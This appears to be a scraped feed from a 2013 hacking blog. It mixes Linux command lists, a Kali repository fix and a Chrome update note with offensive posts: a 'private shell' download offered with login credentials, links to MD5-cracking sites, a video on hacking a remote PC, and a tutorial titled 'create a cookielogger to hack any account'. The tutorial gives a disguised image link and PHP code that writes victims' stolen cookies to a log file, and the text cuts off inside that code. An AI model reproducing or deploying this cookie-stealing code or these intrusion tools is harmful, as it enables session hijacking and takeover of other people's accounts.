<span style="background-color: white;">gzip <b>Compress Or Decompress Named Files</b></span><h2 style="border: 0px; font-size: 12px; font-weight: normal; margin: 0px 0px 0.75em; outline: none medium; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><br /><br /><span style="font-family: Nobile, 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: -webkit-xxx-large; line-height: 22px;"> </span><span style="line-height: 22px;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Network</span></span></span></h2>
</div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;">ifconfig <b>To Config Network Interface</b><br />ping <b>Check The Other System Are Reachable From The Host System</b><br />wget <b>Download Files From Network</b><br />ssh <b>Remote Login Program</b><br />ftp <b> Download/Upload Files From/To Remote System</b><br />last <b>Displays List Of Last Logged In User</b><br />telnet <b>Used To Communicate With Another Host Using THe Telnet Protocol</b><br /><br /><br /> <b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"> Searching Files</span></b></span></div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;">grep <b>Search Files(s) For Specific Text</b></span></div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;">find <b>Search For Files In A Directory Hierarchy</b><br />locate <b>Find Files By Name</b></span></div>
</div>
</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com1tag:blogger.com,1999:blog-5727431290630009200.post-29214994902924025112013-06-05T06:29:00.001-07:002013-06-05T06:30:49.249-07:00PRIV8 SHELL DOWNLOAD<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZjVg20ijZBxFT4msSebmejgqtcCI5lxROS6p0jjqsOFGiSSVriV_UpMS1M7ERO-xfiZhGQgtYOjmJRytGixZM0AQrJt5hRrtHbJBLoWnV38IQlEoF05r-vWPMX1TFq94n57iF_yngvgU/s1600/942648_542552862449737_2101047009_n.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZjVg20ijZBxFT4msSebmejgqtcCI5lxROS6p0jjqsOFGiSSVriV_UpMS1M7ERO-xfiZhGQgtYOjmJRytGixZM0AQrJt5hRrtHbJBLoWnV38IQlEoF05r-vWPMX1TFq94n57iF_yngvgU/s320/942648_542552862449737_2101047009_n.png" width="320" /></a><span style="background-color: white;"><b style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">USERNAME:</b><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"> AL.MaX HaCkEr</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><b style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">PASSWORD:</b><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"> s4cuc:518</span></span><br />
<span style="background-color: white;"><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"><br /></span></span>
<span style="color: #38761d; font-family: verdana, arial, times, Trebuchet MS, sans-serif;"><span style="font-size: 12px; line-height: 18px;"><b>DOWNLOAD: <a href="http://adf.ly/Q3awo">http://adf.ly/Q3awo</a></b></span></span>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com0tag:blogger.com,1999:blog-5727431290630009200.post-22085011494011690062013-06-05T06:25:00.001-07:002013-06-05T06:25:17.810-07:00FIX INSTALLING & UPDATING PACKAGES IN KALI<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYQabxsBbw51XV5gyCiSOZbP2Yu3g_oRnb3qQO6uUhMeuzyYnwEasy9cxWGKy4YIFX7JlbtIuyrePNDNH_A0yZbjnXziVXqwhZ_DALqyUFhSbtwr6rxijvAbXf6VEbRUM60OnyWFtjeB8/s1600/0_600_800_http-__i.haymarket.net.au_News_kali+linux.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYQabxsBbw51XV5gyCiSOZbP2Yu3g_oRnb3qQO6uUhMeuzyYnwEasy9cxWGKy4YIFX7JlbtIuyrePNDNH_A0yZbjnXziVXqwhZ_DALqyUFhSbtwr6rxijvAbXf6VEbRUM60OnyWFtjeB8/s320/0_600_800_http-__i.haymarket.net.au_News_kali+linux.png" width="320" /></a><span style="background-color: white;"><b style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">write in terminal</b><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">nano /etc/apt/sources.list</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">and then replace all text with this</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"># deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL $</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"># deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL $</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">## Security updates</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/ /kali main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/ /wheezy main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/kali kali-dev main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/kali kali-dev main/debian-installer</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb-src </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/kali kali-dev main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/kali kali main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/kali kali main/debian-installer</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb-src </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://http.kali.org/kali kali main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://security.kali.org/kali-security kali/updates main contrib non-free</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">deb-src </span><a href="http://www.facebook.com/notes/backtrack-linux-fan-page/fix-installing-updating-packages-in-kali/472511706159296#" style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-decoration: none;"></a><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">http://security.kali.org/kali-security kali/updates main contrib non-fr$</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">then ctrl+x</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">press y</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">press enter</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><b style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">open terminal and write </b><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">sudo apt-get upgrade </span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">press enter</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">then enter this</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">sudo apt-get update </span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">press enter</span></span>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com2tag:blogger.com,1999:blog-5727431290630009200.post-70921958020271092412013-06-05T05:16:00.003-07:002013-06-05T05:17:56.260-07:00Best sites for crack md5 hashes <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSr6hyrZ0ZL8-2OO_M-3p-b_JCi3jN_kUKwAuiBye00ujmH5Tx_o8FQuvCganUC8TpVyeXQkM15UybDLczw86c-2roEp3xg3iKX15zYx_iMkvEbF7QIk01zjO1sV8NDnBLg5LiStT1GZ4/s1600/Best+Sites+that+crack+md5+hashes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSr6hyrZ0ZL8-2OO_M-3p-b_JCi3jN_kUKwAuiBye00ujmH5Tx_o8FQuvCganUC8TpVyeXQkM15UybDLczw86c-2roEp3xg3iKX15zYx_iMkvEbF7QIk01zjO1sV8NDnBLg5LiStT1GZ4/s1600/Best+Sites+that+crack+md5+hashes.jpg" /></a></div>
<span style="font-family: sans-serif; font-size: x-small;"><span style="line-height: 19.1875px;">The MD5 message-digest algorithm is a widely used cryptographic hash function that produces a 128-bit (16-byte) hash value. Specified in RFC 1321, MD5 has been utilized in a wide variety of security applications, and is also commonly used to check data integrity. MD5 was designed by Ron Rivest in 1991 to replace an earlier hash function, MD4. An MD5 hash is typically expressed as a hexadecimal number, 32 digits long.</span></span><br />
<br />
<br />
<br />
<br />
<h3 class="post-title entry-title" style="border: 0px; font-family: 'PT Sans Narrow'; font-size: 16px; line-height: 19px; margin: 0px 0px 10px; outline: 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;">
<span style="color: #828282;">Sites: </span><a href="http://adf.ly/Q3QpU"><span style="background-color: white; color: lime;">http://adf.ly/Q3QpU</span></a></h3>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com1tag:blogger.com,1999:blog-5727431290630009200.post-69939100947221017732013-06-01T08:46:00.003-07:002013-06-01T08:46:49.956-07:00KALI LINUX - HOW TO HACK REMOTE PC IN ARMITAGE<iframe width="640" height="480" src="http://www.youtube.com/embed/xEW7NAZUv7g" frameborder="0" allowfullscreen></iframe>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com0tag:blogger.com,1999:blog-5727431290630009200.post-22253012193064024002013-06-01T08:26:00.002-07:002013-06-01T08:26:47.418-07:00THANK YOU FOR 3000+ LIKES <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNzWy5UYp1aiiEkRUJCR4oSjGcU8zc6-E1DE46DmD8yX64Ek2iWZjXViETnICac6W2bf4R2myAeF7-xCRS2R2kLHGebqNW076KVKHBS0FPPo3glfE-91_JmIBItKQQNmiK1P-R9wRgXTw/s1600/486749_451829674908563_1938397793_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNzWy5UYp1aiiEkRUJCR4oSjGcU8zc6-E1DE46DmD8yX64Ek2iWZjXViETnICac6W2bf4R2myAeF7-xCRS2R2kLHGebqNW076KVKHBS0FPPo3glfE-91_JmIBItKQQNmiK1P-R9wRgXTw/s320/486749_451829674908563_1938397793_n.jpg" width="320" /></a></div>
<br />Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com0tag:blogger.com,1999:blog-5727431290630009200.post-73150280061379967932013-06-01T02:02:00.000-07:002013-06-01T02:02:32.793-07:00GOOGLE CHROME UPDATED, NOW 5% FASTER BROWSING<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikp8sXi9HE3qIdBfjyYUtWHmOQ1hwTcoAMtWv81WW8VxTHFHQ16pmTLHILGdbH_stuHpXPErLHXjO9RTHzz8ReknUQd2dabxlFRH7LPJazkVLgc31qVQTZfR1P0a7ZXUxN79CjEEuWk2c/s1600/New+Google+Chrome+now+5%25+faster!.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikp8sXi9HE3qIdBfjyYUtWHmOQ1hwTcoAMtWv81WW8VxTHFHQ16pmTLHILGdbH_stuHpXPErLHXjO9RTHzz8ReknUQd2dabxlFRH7LPJazkVLgc31qVQTZfR1P0a7ZXUxN79CjEEuWk2c/s1600/New+Google+Chrome+now+5%25+faster!.png" /></a></div>
<span style="background-color: white; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"><span style="color: #444444;"><br /></span></span>
<span style="background-color: white; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"><span style="color: #444444;"><br /></span></span>
<span style="background-color: white; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"><span style="color: #444444;">The</span></span><span style="background-color: #eeeeee; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"> web browser is arguably the most important piece of software on your computer. You spend much of your time online inside a browser: when you search, chat, email, shop, bank, read the news, and watch videos online, you often do all this using a browser. Google on Tuesday released Chrome version 27 for Windows, Mac, and Linux. The new version features a big boost to page loads, where Chrome combines a minimal design with sophisticated technology to make the web faster, safer, and easier. You can update to the latest release now using the browser’s built-in silent updater, or download it directly from</span><br />
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: #eeeeee; font-size: medium;"><a href="https://www.google.com/intl/en/chrome/browser/"><span style="color: lime;">https://www.google.com/intl/en/chrome/browser/</span></a></span></div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com0tag:blogger.com,1999:blog-5727431290630009200.post-75843560515834976482013-05-30T01:21:00.001-07:002013-05-30T01:22:08.993-07:00CREATE A COOKIELOGGER TO HACK ANY ACCOUNT<br />
<h3 class="post-title entry-title" style="border: 0px; color: #828282; font-family: 'PT Sans Narrow'; font-size: 16px; line-height: 19px; margin: 0px 0px 10px; outline: 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;">
CREATE A COOKIELOGGER TO HACK ANY ACCOUNT</h3>
<div class="post-header" style="border: 0px; color: #828282; font-family: Arial, Verdana, Tahoma, 'Times New Roman'; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<div class="post-header-line-1" style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
</div>
</div>
<div class="post-body entry-content" id="post-body-6091402064603182524" style="border: 0px; color: #828282; font-family: Arial, Verdana, Tahoma, 'Times New Roman'; font-size: 12px; line-height: 21px; margin: 10px 0px 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<div class="separator" style="border: 0px; clear: both; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim4VNEYvgJ0H4S_wn_tqaTxXdqkvoYDsBxrpgdLo-Vv2oLCkAR8AOP3jYLP9ckzxlgm5jYPHuM_mVrtym8mgYrbDy7E9iUp-KPt300iotaNkZc5HPJlWJpE_Fj9bi6vi2wsZrT3SGYxA64/s1600/How+To+Create+a+Cookielogger+to+hack+any+Account.jpg" imageanchor="1" style="-webkit-transition: 0.2s; border: 0px; color: #00a4df; margin: 0px 1em; outline: 0px; padding: 0px; text-decoration: none; transition: 0.2s; vertical-align: baseline;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim4VNEYvgJ0H4S_wn_tqaTxXdqkvoYDsBxrpgdLo-Vv2oLCkAR8AOP3jYLP9ckzxlgm5jYPHuM_mVrtym8mgYrbDy7E9iUp-KPt300iotaNkZc5HPJlWJpE_Fj9bi6vi2wsZrT3SGYxA64/s320/How+To+Create+a+Cookielogger+to+hack+any+Account.jpg" style="-webkit-transition: 0.3s; background-color: white; border: 0px; margin: 0px; outline: 0px; padding: 0px; transition: 0.3s; vertical-align: baseline;" width="320" /></a></div>
<br />
<br />
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.<br />Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …<span id="more-43" style="background-color: transparent; border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></span></div>
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 1:</b> Copy & Save the notepad file from below and Rename it as Fun.gif</span></div>
<a href="http://www.blogger.com/blogger.g?blogID=5727431290630009200" name="more" style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></a><br />
<blockquote class="tr_bq" style="border-left-color: rgb(170, 170, 170); border-left-style: solid; border-width: 0px 0px 0px 10px; margin: 0px 0px 0px 20px; outline: 0px; padding: 0px 0px 0px 20px; quotes: none; vertical-align: baseline;">
<span style="border: 0px; font-family: 'Courier New', Courier, monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a></span></blockquote>
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 2:</b> Copy the Following Script into a Notepad File and Save the file as cookielogger.php:</span></div>
<blockquote class="tr_bq" style="border-left-color: rgb(170, 170, 170); border-left-style: solid; border-width: 0px 0px 0px 10px; margin: 0px 0px 0px 20px; outline: 0px; padding: 0px 0px 0px 20px; quotes: none; vertical-align: baseline;">
<span style="border: 0px; font-family: 'Courier New', Courier, monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">$filename = “logfile.txt”;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">if (isset($_GET["cookie"]))</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">{</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">if (!$handle = fopen($filename, ‘a’))</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">{</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">echo “Temporary Server Error,Sorry for the inconvenience.”;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">exit;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">}</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">else</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">{</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">{</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">echo “Temporary Server Error,Sorry for the inconvenience.”;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">exit;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">}</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">}</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">echo “Temporary Server Error,Sorry for the inconvenience.”;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">fclose($handle);</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 